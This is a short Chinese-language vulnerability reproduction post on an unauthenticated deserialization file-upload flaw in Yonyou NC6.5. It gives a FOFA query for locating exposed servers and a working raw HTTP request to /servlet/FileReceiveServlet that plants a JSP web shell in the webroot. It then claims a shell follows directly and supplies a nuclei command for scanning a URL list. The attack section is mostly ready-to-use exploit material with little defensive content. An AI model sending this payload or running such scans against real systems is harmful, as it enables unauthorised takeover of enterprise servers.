用友NC6.5反序列化文件上传漏洞 nuclei
一、漏洞简介
用友NC产品文件上传的漏洞,恶意攻击者可以通过该漏洞上传任意文件,从而可能导致获取到目标系统管理权限。
根据分析,漏洞为文件上传漏洞,在无需登陆系统的情况下,通过某接口直接上传文件,恶意攻击者成功利用该漏洞可获得目标系统管理权限,系统如果直接暴露在互联网上风险较大,建议及时排查。
二、漏洞影响
用友NC远程代码执行漏洞影响版本:NC6.5之后版本
三、FOFA
app="用友-UFIDA-NC"
四、复现过程
发送请求数据包
POST /servlet/FileReceiveServlet HTTP/1.1 Host: xxx.com:8090 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: close Content-Type: multipart/form-data; Referer: https://google.com Content-Length: 149 ¬ísrjava.util.HashMapÚÁÃ`ÑF loadFactorI thresholdxp?@wt FILE_NAMEt t00ls.jsptTARGET_FILE_PATHt./webapps/nc_webxsasaa


可直接getshell
五、nuclei
nuclei -t yonyou_NC_servlet_upload_rce.yaml -l url.txt
公众号:北极星sec 回复1010获取


参考链接:
https://blog.csdn.net/weixin_44578334/article/details/110917053

浙公网安备 33010602011771号